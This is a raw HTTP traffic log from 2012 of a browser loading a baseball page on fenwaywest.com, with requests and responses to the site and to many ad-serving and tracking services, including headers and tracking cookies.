GET /b?c1=8&amp;c2=2102&amp;c3=0&amp;c4=&amp;c5=&amp;c15=&amp;c16=&amp;ns__t=1353202242463&amp;ns_c=UTF-8&amp;c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;c9=http%3A%2F%2Fwww.shinynylonarts.com%2F HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: UID=546eda-195.159.219.9-1353202238; UIDR=1353202238
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 18 Nov 2012 01:30:42 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.UNCONTEXTUALIZED,PUBLISHER.520266,,CAMPAIGN..0,,ADSIZE.160X600 HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: mc=50a83a3c-b2d37-9dbcd-25149
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Sun, 18 Nov 2012 01:30:42 GMT
Server: QS
GET /templates/yoo_bigeasy/images/module_transparent.png HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.fenwaywest.com/templates/yoo_bigeasy/css/modules.css
Cookie: __qca=P0-1017690683-1353202236609; cto_rtt=; UnicaNIODID=LHSBVeW0yKx-XzFAqs9
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:42 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 28 Jun 2012 12:20:02 GMT
Etag: &quot;eccb35-63-4c38759d56080&quot;
Accept-Ranges: bytes
Content-Length: 99
Keep-Alive: timeout=5, max=494
Connection: Keep-Alive
GET /creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html HTTP/1.1

Host: akamai-media.contextweb.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=1; wf=0
HTTP/1.1 200 OK

Content-Type: text/html
Last-Modified: Tue, 25 Sep 2012 16:55:42 GMT
Accept-Ranges: bytes
Etag: &quot;0bbf3983e9bcd1:0&quot;
Server: Microsoft-IIS/7.5
CW-Server: lga-app1301
ntCoent-Length: 140
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Content-Encoding: gzip
Content-Length: 140
Vary: Accept-Encoding
Cache-Control: private, max-age=835
Date: Sun, 18 Nov 2012 01:30:42 GMT
Connection: keep-alive
GET /adj/yb.fenwaywest/;chan1=mlb;rating=pg;dcopt=;yb=ad;s1=;s2=;tile=3;sz=300x250;ord=885814905? HTTP/1.1

Host: ad.doubleclick.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: DCLK-AdSvr
Content-Length: 267
Content-Encoding: gzip
Date: Sun, 18 Nov 2012 01:30:42 GMT
GET /bh/visitormatch?tag=66902&pid=520266 HTTP/1.1

Host: bh.contextweb.com
GET /bh/visitormatch?tag=66902&amp;pid=520266 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=1; wf=0
HTTP/1.1 200 OK

Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-195-35-223
Date: Sun, 18 Nov 2012 01:30:42 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=A4M4pJeeQdJ7; Domain=.contextweb.com; Expires=Wed, 13-Nov-2013 01:30:42 GMT; Path=/ pb_rtb_ev=2-535461..0.0.1353202242915|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301..0.0.1353202242915|535393..0.0.1353202242915|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088..0.0.1353202242915|538569..0.0.1353202242915|545979..0.0.1353202242915|531292..0.0.1353202242915|543604..0.0.1353202242915|535039..0.0.1353202242915|530739..0.0.1353202242915|537583..0.0.1353202242915|547259..0.0.1353202242915; Domain=.contextweb.com; Expires=Mon, 18-Nov-2013 01:30:42 GMT; Path=/
Content-Length: 3691
Connection: keep-alive
GET /delivery/fp?u=bloguin&z=95032&n=1 HTTP/1.1

Host: www.lijit.com
GET /delivery/fp?u=bloguin&amp;z=95032&amp;n=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
HTTP/1.1 200 OK

Content-Type: text/javascript
Date: Sun, 18 Nov 2012 01:30:42 GMT
Server: PWS/8.0.9.6
X-Px: ms h0-s12.p1-arn ( h0-s14.p1-arn), ht h0-s14.p1-arn.cdngp.net
Cache-Control: max-age=7200
Expires: Sun, 18 Nov 2012 02:48:47 GMT
Age: 2515
Content-Length: 6879
Content-Encoding: gzip
Vary: Accept-Encoding
Connection: keep-alive
GET /p?c1=8&c2=3005693&c3=13&c4=&c5=&c6=&c15=&cv=2.0&cj=1&ljt_r=741113279 HTTP/1.1

Host: b.scorecardresearch.com
GET /p?c1=8&amp;c2=3005693&amp;c3=13&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cv=2.0&amp;cj=1&amp;ljt_r=741113279 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: UID=546eda-195.159.219.9-1353202238; UIDR=1353202238
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 43
Date: Sun, 18 Nov 2012 01:30:43 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /pixel/p-56WJ0KtIxWJ_2.gif?r=0.3409619990640911 HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: mc=50a83a3c-b2d37-9dbcd-25149
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Sun, 18 Nov 2012 01:30:43 GMT
Server: QS
GET /AdServer/AdServerServlet?pubId=28596&siteId=28597&adId=24363&kadheight=250&kadwidth=300&inIframe=1&operId=3&kbgColor=498A72&ktextColor=191919&klinkColor=A60B1D&kltstamp=2012-11-18%202:30:42&timezone=1&screenResolution=1176x885&adPosition=-1x-1&frameName=http_fenwaywest_commediaindex_php_komli_ads_frame_1_28596_28597&prevkadIds=24364&pmUniAdId=top_0_1&ranreq=0.10823524911231308&pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&refurl=http%3A%2F%2Fwww.shinynylonarts.com%2F HTTP/1.1

Host: showads.pubmatic.com
GET /AdServer/AdServerServlet?pubId=28596&amp;siteId=28597&amp;adId=24363&amp;kadheight=250&amp;kadwidth=300&amp;inIframe=1&amp;operId=3&amp;kbgColor=498A72&amp;ktextColor=191919&amp;klinkColor=A60B1D&amp;kltstamp=2012-11-18%202:30:42&amp;timezone=1&amp;screenResolution=1176x885&amp;adPosition=-1x-1&amp;frameName=http_fenwaywest_commediaindex_php_komli_ads_frame_1_28596_28597&amp;prevkadIds=24364&amp;pmUniAdId=top_0_1&amp;ranreq=0.10823524911231308&amp;pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;refurl=http%3A%2F%2Fwww.shinynylonarts.com%2F HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PUBMDCID=3; KADUSERCOOKIE=7577C4DA-3995-4153-9A0B-7C9927BF1013; pubfreq_28597=; pubtime_28597=TMC; _curtime=1353202240; pubfreq_28597_24364_1667996297=243-1; PMDTSHR=cat:; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_80=1336-3f62d100-dd98-4006-b187-452598b27a1b.; PUBRETARGET=390_1360978240
HTTP/1.1 200 OK

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:43 GMT
Server: Apache
Set-Cookie: PUBMDCID=3; domain=pubmatic.com; expires=Mon, 18-Nov-2013 01:30:43 GMT; path=/ KADUSERCOOKIE=7577C4DA-3995-4153-9A0B-7C9927BF1013; domain=pubmatic.com; expires=Mon, 18-Nov-2013 01:30:43 GMT; path=/ _curtime=1353202243; domain=pubmatic.com; expires=Sun, 18-Nov-2012 02:40:43 GMT; path=/ pubfreq_28597_24363_840544334=243-1; domain=pubmatic.com; expires=Sun, 18-Nov-2012 02:10:43 GMT; path=/ PMDTSHR=cat:; domain=pubmatic.com; expires=Mon, 19-Nov-2012 01:30:43 GMT; path=/
X-ktk: AdServer2013
Vary: Accept-Encoding
Content-Encoding: gzip
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
GET /context_sync?call_type=iframe HTTP/1.1

Host: contextweb.pixel.invitemedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: uid=f45883da-a5b2-4229-92e5-ccb518d47872; dp_rec=&quot;{\&quot;4\&quot;:1353202240}&quot;; camp_freq_p1=&quot;eJzjkuH4sJFfgFHiwJcFrawKjBoHpi9rZTVgtADzAZ0HCv0=&quot;; exchange_uid=eyI3IjpbIjc1NzdDNERBLTM5OTUtNDE1My05QTBCLTdDOTkyN0JGMTAxMyIsNzM0ODI1XSwiNCI6WyJDQUVTRUU1Q2Q0Umh0eUxPeDV6YXVlanVMVU0iLDczNDgyNV19; impressions_p1=&quot;eJzjcuRgF1IxMHR2tTQxMNc1MTU11TUxsDTUtTSzMNF1MTI0N3Q2c3R0MrSUOPBlQSurwtEvRRozfnMY9K5jtViuHdHzkBEAClwTeA==&quot;; io_freq_p1=&quot;eJzjkuF4eYtRgFHiwJcFrawKjBoHpi9rZTVgtADzAZ8WCxE=&quot;; partnerUID=&quot;eyI4NCI6WyI1RldPd3k5OTk5ZTIxdkN4Iix0cnVlXX0=&quot;
HTTP/1.1 200 OK

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:43 GMT
Pragma: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC&quot;
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 151
Connection: close
Server: Jetty(7.3.1.v20110307)
Set-Cookie: impressions=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT clicks=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT segments=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT io_frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT
GET /AdServer/AdDisplayTrackerServlet?operId=1&pubId=28596&siteId=28597&adId=24363&adServerId=243&kefact=0.400000&kaxefact=0.400000&kadNetFrequecy=2&kadwidth=300&kadheight=250&kadsizeid=9&kltstamp=1353202243&indirectAdId=0&adServerOptimizerId=2&ranreq=0.10823524911231308&kpbmtpfact=0.457674&carrierid=-1&campaignId=1336&creativeId=0&pctr=0.000000&wDSPByrId=230&imprCap=1&pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: track.pubmatic.com
GET /AdServer/AdDisplayTrackerServlet?operId=1&amp;pubId=28596&amp;siteId=28597&amp;adId=24363&amp;adServerId=243&amp;kefact=0.400000&amp;kaxefact=0.400000&amp;kadNetFrequecy=2&amp;kadwidth=300&amp;kadheight=250&amp;kadsizeid=9&amp;kltstamp=1353202243&amp;indirectAdId=0&amp;adServerOptimizerId=2&amp;ranreq=0.10823524911231308&amp;kpbmtpfact=0.457674&amp;carrierid=-1&amp;campaignId=1336&amp;creativeId=0&amp;pctr=0.000000&amp;wDSPByrId=230&amp;imprCap=1&amp;pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PUBMDCID=3; KADUSERCOOKIE=7577C4DA-3995-4153-9A0B-7C9927BF1013; pubfreq_28597=; pubtime_28597=TMC; _curtime=1353202243; pubfreq_28597_24364_1667996297=243-1; PMDTSHR=cat:; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_80=1336-3f62d100-dd98-4006-b187-452598b27a1b.; PUBRETARGET=390_1360978240; pubfreq_28597_24363_840544334=243-1
HTTP/1.1 200 OK

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:43 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
GET /site/5969 HTTP/1.1

Host: tags.bluekai.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: bkc=KJpM8sJQteS5QzcHSAD99hOy9FZkDNc8YVCXHQRW4yIxF0rRYRUwzQCPFk6JkHdeQr9e9W0FauQ=; bklc=0; bko=; bkp1=; bkst=KJhMR5Mehze9pkYSk8tUU8f7SnDi999ooyPP; bku=F9G99WWb3aevIyWd; bkw5=; bkdc=snv
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:43 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP=&quot;NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV&quot;, policyref=&quot;http://tags.bluekai.com/w3c/p3p.xml&quot;
Expires: Mon, 19 Nov 2012 01:30:43 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bkc=KJynas5QYelWhmOL+uv9ARsO/He/dfQBk4XKMHdeyQe7zl/h1s0qpLeQYmxpxwZkDNc8YVCXAeTR4yIxF0rRYRUwzQCPFk6JkxI0cXRc9OLO/VA=; expires=Fri, 17-May-2013 01:30:43 GMT; path=/; domain=.bluekai.com bklc=50a83a43; expires=Fri, 17-May-2013 01:30:43 GMT; path=/; domain=.bluekai.com bkdc=snv; expires=Tue, 18-Dec-2012 01:30:43 GMT; path=/; domain=.bluekai.com
BK-Server: c51b
Content-Length: 62
GET /build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAArXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAACQAAAAAAAAACAAAANzU3N0M0REEtMzk5NS00MTUzLTlBMEItN0M5OTI3QkYxMDEzAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&cost=0.4577&creative_id=371685&zip_code=unknown&referrer_url=http%253A%252F%252Fwww.shinynylonarts.com%252F&exch_id=7&line_item_id=1850887&b=rh176.ovq.wiz.cebq2&source_url=http%3A%2F%2Fwww.yardbarker.com&auction_id=560F290B-F280-4C2D-A29D-C38D70226966&us_id=5543&invite_uid=3f62d100-dd98-4006-b187-452598b27a1b&pub_line_item_id=87821&mapped_uid=7-7577C4DA-3995-4153-9A0B-7C9927BF1013&inv_size_id=146842&campaign_id=252144&p_us_id=28812 HTTP/1.1

Host: eeu.rtb.prod2.invitemedia.com
GET /build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAArXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAACQAAAAAAAAACAAAANzU3N0M0REEtMzk5NS00MTUzLTlBMEItN0M5OTI3QkYxMDEzAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&amp;cost=0.4577&amp;creative_id=371685&amp;zip_code=unknown&amp;referrer_url=http%253A%252F%252Fwww.shinynylonarts.com%252F&amp;exch_id=7&amp;line_item_id=1850887&amp;b=rh176.ovq.wiz.cebq2&amp;source_url=http%3A%2F%2Fwww.yardbarker.com&amp;auction_id=560F290B-F280-4C2D-A29D-C38D70226966&amp;us_id=5543&amp;invite_uid=3f62d100-dd98-4006-b187-452598b27a1b&amp;pub_line_item_id=87821&amp;mapped_uid=7-7577C4DA-3995-4153-9A0B-7C9927BF1013&amp;inv_size_id=146842&amp;campaign_id=252144&amp;p_us_id=28812 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: uid=f45883da-a5b2-4229-92e5-ccb518d47872; dp_rec=&quot;{\&quot;4\&quot;:1353202240}&quot;; camp_freq_p1=&quot;eJzjkuH4sJFfgFHiwJcFrawKjBoHpi9rZTVgtADzAZ0HCv0=&quot;; exchange_uid=eyI3IjpbIjc1NzdDNERBLTM5OTUtNDE1My05QTBCLTdDOTkyN0JGMTAxMyIsNzM0ODI1XSwiNCI6WyJDQUVTRUU1Q2Q0Umh0eUxPeDV6YXVlanVMVU0iLDczNDgyNV19; impressions_p1=&quot;eJzjcuRgF1IxMHR2tTQxMNc1MTU11TUxsDTUtTSzMNF1MTI0N3Q2c3R0MrSUOPBlQSurwtEvRRozfnMY9K5jtViuHdHzkBEAClwTeA==&quot;; io_freq_p1=&quot;eJzjkuF4eYtRgFHiwJcFrawKjBoHpi9rZTVgtADzAZ8WCxE=&quot;; partnerUID=&quot;eyI4NCI6WyI1RldPd3k5OTk5ZTIxdkN4Iix0cnVlXX0=&quot;
HTTP/1.1 200 OK

Content-Type: text/html
Connection: close
Content-Length: 3578
Date: Sun, 18 Nov 2012 01:30:43 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Server: Jetty(7.3.1.v20110307)
GET /ga.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 14948
Content-Encoding: gzip
Last-Modified: Wed, 07 Nov 2012 22:33:51 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Sat, 17 Nov 2012 23:57:54 GMT
Expires: Sun, 18 Nov 2012 11:57:54 GMT
Vary: Accept-Encoding
Age: 5569
Cache-Control: max-age=43200, public
Server: GFE/2.0
GET /bh/rtset?do=add&pid=538569&ev=f45883da-a5b2-4229-92e5-ccb518d47872 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=538569&amp;ev=f45883da-a5b2-4229-92e5-ccb518d47872 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://contextweb.pixel.invitemedia.com/context_sync?call_type=iframe
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=1; wf=0; pb_rtb_ev=2-535461..0.0.1353202242915|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301..0.0.1353202242915|535393..0.0.1353202242915|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088..0.0.1353202242915|538569..0.0.1353202242915|545979..0.0.1353202242915|531292..0.0.1353202242915|543604..0.0.1353202242915|535039..0.0.1353202242915|530739..0.0.1353202242915|537583..0.0.1353202242915|547259..0.0.1353202242915
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-84-141-75
Date: Sun, 18 Nov 2012 01:30:42 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
